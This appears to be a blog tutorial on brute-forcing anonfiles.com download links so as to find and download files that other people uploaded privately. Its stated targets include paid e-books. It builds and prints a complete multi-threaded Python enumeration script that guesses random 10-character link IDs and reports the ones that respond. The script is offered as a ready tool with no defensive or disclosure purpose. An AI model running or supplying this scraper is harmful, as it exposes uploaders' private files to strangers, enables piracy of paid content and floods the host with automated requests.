Finding Public Download Links To Private Files

Let us begin with the idea. We know the many people use file-hosting sites to upload their data. Not only random dog pictures but also malware or even some things like paid e-books. So what can I do if I want to obtain these files? Most file hosting services don’t have a search function on their site.

Bruteforcing Anonfiles Download Links With Python

This method is by far not efficient but interesting to play around with. At first, let us take a look at some links: https://anonfiles.com/Nc6f3a78qc/

Seems like we have 10 random characters, these can contain uppercase letters, lowercase letters, and numbers.

We start with importing the needed modules:

import requests
import random
import string

We will use requests to check the status code of the link and a combination out of random and string to generate our link list.

We create an own function called “link_generator”. We define a size of 10 and the types of characters we want to use. Then we pick a random choice from our characters. We do this ten times and join them together.

def link_generator(size=10, chars=string.ascii_lowercase + string.ascii_uppercase + string.digits):
return ''.join(random.choice(chars) for _ in range(size))

We need a function to load our link and check for the status code.

At first, we load our link with the requests module. We will only get the data from hour head, this will improve the speed of our script. Now let’s check if the status code of the response is 200.

If we meet the requirements we want to print our link.

def load_url(url):
r = requests.head(url)
if r.status_code == 200:
print(str(r.status_code) + ": " + url)

To use this function we need a list of links to check. Let us create a list of random links with our link generator function. We define an empty list called “urls” and append our main link with a random end.

for i in range(100):
urls.append('https://anonfiles.com/' + link_generator())

If we now call our “load_url” function we can start brute-forcing for links.

for url in urls:
load_url(url)

Let’s clear it a bit up and add multi-threading to check the links faster. I will also change some variables to input so it’s easier to use from your command line. This is the finished code:

import requests
import random
import string
from time import time
from concurrent.futures import ThreadPoolExecutor, as_completed
import concurrent.futures

urls = []
out = []
results = []

THREADS = input("Threads: ")
AMOUNT = input("Links to scrape: ")

def link_generator(size=10, chars=string.ascii_lowercase + string.ascii_uppercase + string.digits):
return ''.join(random.choice(chars) for _ in range(size))

def load_url(url):
r = requests.head(url)
if r.status_code == 200:
print(str(r.status_code) + ": " + url)
results.append(url)

for i in range(int(AMOUNT)):
urls.append('https://anonfiles.com/' + link_generator())


start = time()
with ThreadPoolExecutor(max_workers=int(THREADS)) as executor:
future_to_url = (executor.submit(load_url, url) for url in urls)

for future in concurrent.futures.as_completed(future_to_url):
out.append(1)
print("Checked: " + str(len(out)) + " - " + "Results: " + str(len(results)),end="\r")

print(f'Time taken: {time() - start}')